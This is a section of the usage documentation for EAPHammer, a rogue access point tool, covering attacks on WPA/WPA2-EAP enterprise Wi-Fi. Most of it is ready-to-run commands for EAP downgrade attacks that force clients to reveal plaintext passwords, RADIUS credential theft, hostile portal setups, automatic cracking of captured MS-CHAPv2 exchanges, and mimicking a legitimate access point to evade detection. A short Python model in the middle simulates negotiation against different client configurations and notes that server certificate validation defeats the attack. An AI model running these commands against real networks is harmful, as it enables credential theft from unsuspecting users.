VIII. Attacking WPA EAP and WPA2 EAP Networks
To execute a rogue access point attack against a network that uses WPA2-EAP, just use the --auth flag as shown below:
./eaphammer -i wlan0 \
-e mysecurenetwork \
--auth wpa-eap
By default, eaphammer will use WPA2 rather than WPA. However, you can specify the WPA version manually using the --wpa-version flag as shown below:
# use WPA2
./eaphammer -i wlan0 \
-e equihax \
--auth wpa-eap \
--wpa-version 2
# use WPA
./eaphammer -i wlan0 \
-e pwnera \
--auth wpa-eap \
--wpa-version 1
There is no need to specify an EAP type, as eaphammer will negotiate the EAP type on a victim-by-victim basis as they connect to the rogue AP. EAPHammer will automatically use the least secure EAP type supported by the client in order to make cracking attempts easier.
For the most part, attacks against WPA2-EAP networks require creds in order to work. The exception to this is that you don't need creds to steal creds (because that's just redundant). The reason for this is that the more advanced forms of WPA2-EAP use MS-CHAPv2, which requires mutual authentication between the wireless client and the access point. In other words, if you cannot prove knowledge of the victim's password, you will not be able to get the victim to fully associate with you.
Fortunately, you have a couple of options available to you. The first option is to simply steal a bunch of RADIUS creds using the --creds flag (see II. Stealing RADIUS Credentials Using EAPHammer for instructions on how to do this). You can then crack the creds offline, then return and finish the attack later. This method will work regardless of the strength of the user's password due to weaknesses found in MS-CHAPv2 (see Defeating PPTP VPNs and WPA2 Enterprise with MS-CHAPv2 | DC20 | Moxie Marlinspike and David Hulton). You will also have to add the cracked RADIUS creds to EAPHammer's database. Please refer to IX. EAPHammer User Database for instructions on how to do this.
For victims with weak passwords, you can use the --autocrack flag in order to perform an auto crack 'n add attack (see VIII.3 - Using AutoCrack for usage instructions, see Improvements In Rogue AP Attacks - MANA 1/2 for details on how this attack works).
EAPHammer supports the ability to perform a variety of EAP Downgrade attacks (including the GTC Downgrade attack) to attempt to force client devices to surrender plaintext credentials.
This is actually a pretty lengthy topic, so please refer to the following blog post if you want to understand more about this functionality:
EAPHammer's default behavior is to suggest the following sequences of EAP methods during EAP negotiation:
# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST
# Phase 2 (inner authentication)
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
EAPHammer first attempts to downgrade to GTC, and then immediately falls back to stronger EAP methods if the attempt fails. This balanced approach is designed to maximize impact while minimizing the risk of protracted EAP negotiations.
To execute this attack, run EAPHammer with the --negotiate balanced flag:
./eaphammer --interface wlan0 \
--negotiate balanced \
--auth wpa-eap \
--essid example \
--creds
Alternatively, just omit the --negotiate flag altogether:
./eaphammer --interface wlan0 \
--auth wpa-eap \
--essid example \
--creds
Should you want to perform a full EAP downgrade attack, you can do so using the --negotiate weakest flag:
./eaphammer --interface wlan0 \
--negotiate weakest \
--auth wpa-eap \
--essid example \
--creds
This will instruct EAPHammer to suggest the following sequences of EAP methods during EAP negotiation:
# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST
# Phase 2 (inner authentication)
GTC,TTLS-PAP,MD5,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,TTLS-MSCHAPV2,TTLS
Keep in mind that using this option may lead to long EAP negotiation times, which can be detrimental to the overall effectiveness of your attack.
In speed mode (--negotiate speed), EAPHammer proposes the EAP methods that are most likely to succeed first:
./eaphammer --interface wlan0 \
--negotiate speed \
--auth wpa-eap \
--essid example \
--creds
This will instruct EAPHammer to suggest the following sequences of EAP methods during EAP negotiation:
# Phase 1 (outer authentication)
PEAP,TTLS,TLS,FAST
# Phase 2 (inner authentication)
MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,GTC,TTLS-PAP,TTLS-MSCHAP,MD5
Use this mode if you have trouble getting clients to finish the EAP authentication process using the default mode.
To execute @W00Tock's highly efficient GTC downgrade implementation, use the --negotiate gtc-downgrade flag:
./eaphammer --interface wlan0 \
--negotiate gtc-downgrade \
--auth wpa-eap \
--essid example \
--creds
This will instruct EAPHammer to suggest the following sequences of EAP methods during EAP negotiation:
# Phase 1 (outer authentication)
PEAP [ver=1]
# Phase 2 (inner authentication)
GTC
See https://twitter.com/w00tock/status/1019251419310972930 for source of this attack.
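The four proposal orders above only matter in combination with what the supplicant is willing to accept, which is the defender's lever. The following Python model is an added example written for this page, not EAPHammer's code: it takes the phase 2 orders quoted above for each --negotiate mode and walks them against three constructed supplicant profiles (the profile names, the accepted-method sets and the "validates server cert" flag are assumptions for illustration) to show which inner method each mode ends up with, how many proposals it had to try, and whether the result is a plaintext password, challenge/response material, or nothing at all.

```python
"""Model of EAP inner-method negotiation for the --negotiate modes quoted above.

Added example, not EAPHammer's own code. PHASE2_ORDERS is taken from the page;
the supplicant profiles are constructed to show how client policy (accepted
inner methods, server certificate validation) decides what a rogue AP obtains.
"""

# Phase 2 (inner authentication) proposal orders quoted on this page.
PHASE2_ORDERS = {
    "balanced": ["GTC", "MSCHAPV2", "TTLS-MSCHAPV2", "TTLS", "TTLS-CHAP",
                 "TTLS-PAP", "TTLS-MSCHAP", "MD5"],
    "weakest": ["GTC", "TTLS-PAP", "MD5", "TTLS-CHAP", "TTLS-MSCHAP",
                "MSCHAPV2", "TTLS-MSCHAPV2", "TTLS"],
    "speed": ["MSCHAPV2", "TTLS-MSCHAPV2", "TTLS", "TTLS-CHAP", "GTC",
              "TTLS-PAP", "TTLS-MSCHAP", "MD5"],
    "gtc-downgrade": ["GTC"],
}

# Inner methods that hand the password itself to whoever terminates the TLS
# tunnel; the remaining methods are challenge/response exchanges.
PLAINTEXT_METHODS = {"GTC", "TTLS-PAP"}

# Constructed supplicant profiles (assumptions, not from the page).
PERMISSIVE_CLIENT = {
    "name": "permissive",
    "validates_server_cert": False,
    "inner_methods": {"GTC", "MSCHAPV2", "TTLS-PAP", "TTLS-MSCHAPV2"},
}
MSCHAP_ONLY_CLIENT = {
    "name": "mschapv2-only, no cert check",
    "validates_server_cert": False,
    "inner_methods": {"MSCHAPV2"},
}
HARDENED_CLIENT = {
    "name": "mschapv2-only, validates server cert",
    "validates_server_cert": True,
    "inner_methods": {"MSCHAPV2"},
}


def negotiate(order, accepted):
    """Walk the AP's proposal list; the supplicant NAKs every method outside
    its accepted set. Returns (method, proposals_tried); method is None when
    the whole list was exhausted without a match."""
    for tried, method in enumerate(order, start=1):
        if method in accepted:
            return method, tried
    return None, len(order)


def outcome(mode, client, server_cert_trusted=False):
    """Classify what an AP running the given --negotiate mode ends up with
    against this client profile."""
    if client["validates_server_cert"] and not server_cert_trusted:
        # Phase 1 never completes: the TLS tunnel is refused, so no inner
        # method is ever proposed, whatever the order.
        return {"method": None, "exposure": "none", "tried": 0,
                "reason": "server certificate rejected"}
    method, tried = negotiate(PHASE2_ORDERS[mode], client["inner_methods"])
    if method is None:
        exposure, reason = "none", "no acceptable inner method"
    elif method in PLAINTEXT_METHODS:
        exposure, reason = "plaintext", "password disclosed inside the tunnel"
    else:
        exposure, reason = "challenge-response", "hash material captured"
    return {"method": method, "exposure": exposure, "tried": tried,
            "reason": reason}


if __name__ == "__main__":
    for mode in PHASE2_ORDERS:
        for client in (PERMISSIVE_CLIENT, MSCHAP_ONLY_CLIENT, HARDENED_CLIENT):
            r = outcome(mode, client)
            print(f"{mode:14} {client['name']:38} {str(r['method']):14} "
                  f"{r['exposure']:18} tried={r['tried']} ({r['reason']})")
```

Running the script prints one row per mode and profile. The permissive profile yields GTC on the first proposal in balanced and gtc-downgrade mode, while the MSCHAPv2-only profile forces weakest mode through six proposals before landing on a challenge/response method and makes gtc-downgrade fail outright; the hardened profile never reaches phase 2 unless the server certificate is trusted, which is the property a supplicant configuration should be checked for.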
To manually control which EAP methods are used by EAPHammer, as well as the order in which they are suggested to the client, use the --negotiate manual flag in conjunction with the --phase-2-methods and --phase-1-methods flags:
./eaphammer --interface wlan0 \
--negotiate manual \
--phase-1-methods PEAP,TTLS \
--phase-2-methods MSCHAPV2,GTC,TTLS-MSCHAP \
--auth wpa-eap \
--essid example \
--creds
Manual control over the EAP negotiation process is useful in situations where the access point's behavior must be mimicked in order to evade detection.
To use your own EAP User file, instead of relying on EAPHammer's automated processes, run EAPHammer with the --eap-user-file flag:
./eaphammer --interface wlan0 \
--eap-user-file /tmp/i-like-to-write-things-by-hand.eap_user \
--auth wpa-eap \
--essid painful \
--creds
"Autocrack 'n add" is a technique introduced by Dominic White and Ian de Villiers in 2014 and first implemented in their Mana Toolkit. When autocrack 'n add is used, the captured MS-CHAPv2 challenge and response are immediately sent to a cracking rig (local or remote) before the authentication response is sent to the victim. The cracked credentials are then appended to the end of the eap_user file. If the challenge and response are cracked fast enough, the cracked credentials are added to the eap_user file before hostapd attempts to retrieve them. Even if the challenge and response cannot be cracked in time, the attack will succeed when the client attempts to reauthenticate, provided the password can be cracked within a short period of time. When weak passwords are used, this process can take seconds. See the original Improvements In Rogue AP Attacks - MANA 1/2 blog post for a more detailed explanation of this attack.
To use EAPHammer's builtin AutoCrack capability, just include the --autocrack flag with whatever attack you are attempting to perform. For example, to enable AutoCrack while performing a Hostile Portal attack, you can use the following command:
./eaphammer -i wlan0 \
--essid EvilC0rp \
-c 6 \
--auth wpa-eap \
--hostile-portal \
--autocrack
Note: At this time, EAPHammer only supports performing an autocrack 'n add using EAPHammer's internal hash cracking capability. Unless you're using a cracking rig to run EAPHammer, this is going to be very slow. Support for sending hashes to a remote cracking rig will be added in the future.
Note: Hostapd loads known usernames and passwords into memory at startup. This means that you'll have to manually restart your rogue AP every time new creds are captured using autocrack 'n add. This will result in a delay of a few seconds, and will also require you to personally supervise your rogue AP (which you should probably be doing anyways if you care about tradecraft...). Fixing this issue would require fundamental changes to the way hostapd works, which the developer has zero interest in implementing or maintaining.